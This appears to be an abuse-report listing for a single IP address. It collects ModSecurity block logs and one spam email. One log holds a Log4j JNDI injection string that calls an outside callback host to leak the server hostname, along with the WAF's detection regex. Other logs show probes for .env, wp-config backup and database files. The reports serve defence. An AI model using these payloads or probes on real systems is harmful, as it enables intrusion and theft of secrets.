๐บ๐ธ
TPI-Abuse
2026-02-01 11:21:41
(4 months ago)
(mod_security) mod_security (id:248270) triggered by 104.239.81.163 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:248270) triggered by 104.239.81.163 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Feb 01 06:21:36.041385 2026] [security2:error] [pid 16722:tid 16860] [client 104.239.81.163:35115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\$\\\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\\\$\\\\{(?:lower|upper)):" at ARGS:x. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||kettlehill.net:80|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "kettlehill.net"] [uri "/"] [unique_id "aX83QMyMbG6v0xSDvGJRSwAAAsE"], referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d5vjdnq4eq3dbl1dehe0x5kqba3f8584w.rsfi.info}
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-12-02 22:43:05
(6 months ago)
(mod_security) mod_security (id:210492) triggered by 104.239.81.163 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:210492) triggered by 104.239.81.163 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Dec 02 17:43:00.419386 2025] [security2:error] [pid 22900:tid 22900] [client 104.239.81.163:54451] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpcontacts.farmers123.com"] [uri "/.env.www"] [unique_id "aS9rdFO2V2DC3DFXXA17sAAAAB0"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-11-12 10:53:03
(6 months ago)
(mod_security) mod_security (id:210492) triggered by 104.239.81.163 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:210492) triggered by 104.239.81.163 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Nov 12 05:52:57.783384 2025] [security2:error] [pid 439:tid 439] [client 104.239.81.163:51083] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "nbcnewsradio.com"] [uri "/api/.env"] [unique_id "aRRnCZC1as1XR1hNhB4PiAAAAA4"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-09-26 05:08:50
(8 months ago)
(mod_security) mod_security (id:210730) triggered by 104.239.81.163 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:210730) triggered by 104.239.81.163 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Sep 26 01:08:44.064498 2025] [security2:error] [pid 32368:tid 32368] [client 104.239.81.163:48147] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "4"] [msg "COMODO WAF: URL file extension is restricted by policy||ftp.deandobkin.com|F|2"] [data ".db"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "ftp.deandobkin.com"] [uri "/deandobkin.db"] [unique_id "aNYf3JQAyTRh8ZjLUisQkgAAABI"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-07-01 06:51:50
(11 months ago)
(mod_security) mod_security (id:210492) triggered by 104.239.81.163 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:210492) triggered by 104.239.81.163 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Jul 01 02:51:44.046514 2025] [security2:error] [pid 15241:tid 15301] [client 104.239.81.163:42335] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "mail.kettlehill.com"] [uri "/wp-config.php.bak"] [unique_id "aGOFgHYF3eGjRiRZ58ZVcAAAAFc"]
show less
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2025-06-03 05:00:07
(1 year ago)
| Common web attack.
Hacking
SQL Injection
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-06-01 14:44:12
(1 year ago)
(mod_security) mod_security (id:210730) triggered by 104.239.81.163 (-): 1 in the last 300 secs; Por ...
show more
(mod_security) mod_security (id:210730) triggered by 104.239.81.163 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Jun 01 10:44:07.896182 2025] [security2:error] [pid 2925723:tid 2925723] [client 104.239.81.163:45409] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||autodiscover.nbcnewsradio.com|F|2"] [data ".com.db"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "autodiscover.nbcnewsradio.com"] [uri "/nbcnewsradio.com.db"] [unique_id "aDxnN-MupWqC8yfQGKt5jwAAABU"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
nowyouknow
2023-07-24 20:15:46
(2 years ago)
(From [email protected] ) Hi,
Would you be open to do an interview?
We are in ...
show more
(From [email protected] ) Hi,
Would you be open to do an interview?
We are interviewing business owners like you and give them the chance to share their story.
Would you like more information on how this works?
If Yes, please contact this email: [email protected]
We are looking forward to hear from you
Best,
Donna Kley
show less
Phishing
Web Spam